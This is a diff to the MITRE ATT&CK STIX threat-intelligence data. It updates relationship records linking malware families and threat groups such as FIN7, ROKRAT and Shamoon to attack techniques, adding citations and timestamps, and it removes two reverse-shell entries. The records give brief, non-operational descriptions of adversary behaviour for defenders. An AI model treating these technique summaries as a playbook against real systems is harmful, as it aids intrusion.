- "description": "[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-23T22:01:45.946Z",
+ "modified": "2020-05-14T15:14:33.552Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42130,7 +43180,7 @@
{
"id": "relationship--4856de0a-2635-4081-97a8-3f15593c2aa5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) uses a PowerShell script to launch shellcode that retrieves an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -42150,7 +43200,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-30T23:13:18.381Z",
+ "modified": "2020-06-24T19:07:46.912Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42188,12 +43238,12 @@
"url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--bbc31a33-f55f-43d4-a3fd-23426c5fc638",
@@ -42296,13 +43346,13 @@
"external_references": [
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
}
],
"description": "(Citation: ESET RTM Feb 2017)",
"type": "relationship",
- "modified": "2019-03-25T16:54:05.812Z",
+ "modified": "2020-05-12T22:13:16.808Z",
"created": "2017-05-31T21:33:27.081Z"
},
{
@@ -42513,12 +43563,12 @@
"url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
}
],
- "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--a9bf9268-1c45-4293-a5c2-c493556ad546",
@@ -42728,16 +43778,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.631Z",
+ "modified": "2020-06-02T16:14:00.319Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42931,7 +43981,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
- "modified": "2020-03-29T23:30:21.522Z",
+ "modified": "2020-06-20T22:29:55.654Z",
"created": "2017-05-31T21:33:27.018Z"
},
{
@@ -42964,16 +44014,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.651Z",
+ "modified": "2020-04-21T23:09:31.336Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -43265,16 +44315,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:42:10.656Z",
+ "modified": "2020-04-21T23:09:31.022Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -43920,12 +44970,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99"
}
],
- "source_ref": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--e79c65f4-f9d2-4568-96a4-b6e00d3bad71",
@@ -44299,12 +45349,12 @@
"url": "https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--3a6c13d3-6589-4d33-9848-88e3409be0cc",
@@ -44461,7 +45511,7 @@
{
"id": "relationship--c4f662d6-7e47-4161-bf8d-dd445ae901b1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system using the gdi32 library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -44477,16 +45527,21 @@
"source_name": "Talos ROKRAT 2"
},
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.202Z",
+ "modified": "2020-05-21T17:07:02.485Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -44561,7 +45616,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -44570,7 +45625,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.153Z",
+ "modified": "2020-04-16T19:41:40.516Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -44723,12 +45778,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
}
],
- "source_ref": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--b4c7e12f-6921-4007-ab15-595969bf9eca",
@@ -44948,14 +46003,14 @@
"target_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.313Z",
+ "modified": "2020-04-16T19:41:40.435Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -45636,15 +46691,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under C:\\ProgramData\\Apple\\Updates\\.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under C:\\ProgramData\\Apple\\Updates\\ and C:\\Users\\Public\\Documents\\Flash\\.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--4269342d-fd7b-4fc6-882f-5099da627c85",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.083Z",
+ "modified": "2020-05-21T14:55:00.348Z",
"created": "2019-01-29T20:17:49.308Z"
},
{
@@ -45766,12 +46826,12 @@
"url": "http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea"
}
],
- "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -46322,12 +47382,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--edaa004e-8239-40d8-a4f0-8849c4f0e87f",
@@ -46658,16 +47718,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.599Z",
+ "modified": "2020-04-21T23:09:31.029Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47050,12 +48110,12 @@
"url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896"
},
{
"id": "relationship--41e52a99-9797-4c31-8b3c-7adeed98310a",
@@ -47183,27 +48243,6 @@
"modified": "2019-04-24T23:41:40.061Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--e795d8ec-a11c-4809-a70a-46aa033fec82",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Chaos Stolen Backdoor",
- "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.",
- "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/"
- }
- ],
- "source_ref": "malware--5bcd5511-6756-4824-a692-e8bb109364af",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "type": "relationship",
- "modified": "2020-03-27T22:13:43.216Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--62f9aa2c-b0c1-4028-a2b8-c436e30ace4b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -47753,12 +48792,12 @@
"url": "http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml"
}
],
- "source_ref": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c"
},
{
"id": "relationship--e0999d7e-deec-446b-a86b-4c8988e20a96",
@@ -47898,7 +48937,7 @@
{
"id": "relationship--4eb00375-3ee3-43c7-845a-2206e1eff114",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -47907,13 +48946,18 @@
"url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
"source_name": "Talos Group123"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.221Z",
+ "modified": "2020-05-21T17:07:02.504Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47946,16 +48990,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.663Z",
+ "modified": "2020-04-21T23:09:31.014Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47987,7 +49031,7 @@
{
"id": "relationship--e7b5511a-3528-48d1-9224-6c5ff88b3825",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Winnti](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -48012,12 +49056,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--a901eaf4-7cbe-43c2-9c03-7d716357edc9",
@@ -48248,22 +49292,27 @@
{
"id": "relationship--5e6e745f-d756-4b6e-90e1-3adcf848570b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)",
+ "description": "If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"type": "relationship",
- "modified": "2020-03-16T18:58:45.652Z",
+ "modified": "2020-05-29T18:11:23.456Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -48610,12 +49659,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9"
},
{
"id": "relationship--14639d10-6371-4e84-a637-a0e5846cb053",
@@ -48709,7 +49758,7 @@
{
"id": "relationship--f832e042-6859-4415-9b6c-4e093dc955ec",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application whitelisting techniques.(Citation: FireEye APT19)",
+ "description": "[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application control techniques.(Citation: FireEye APT19)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -48724,7 +49773,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-04-25T11:39:52.084Z",
+ "modified": "2020-06-20T22:48:29.688Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -48737,7 +49786,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -48745,7 +49794,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.297Z",
+ "modified": "2020-06-22T17:54:15.490Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -48905,27 +49954,6 @@
"modified": "2019-03-25T17:15:03.466Z",
"created": "2017-05-31T21:33:27.079Z"
},
- {
- "id": "relationship--9b906d63-83bd-46de-909e-80a8712b94de",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Umbreon Trend Micro",
- "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046"
- }
- ],
- "source_ref": "malware--3d8e547d-9456-4f32-a895-dc86134e282f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "type": "relationship",
- "modified": "2020-03-27T22:14:19.045Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--d200ba08-8179-495e-a854-9b13be5c0f93",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
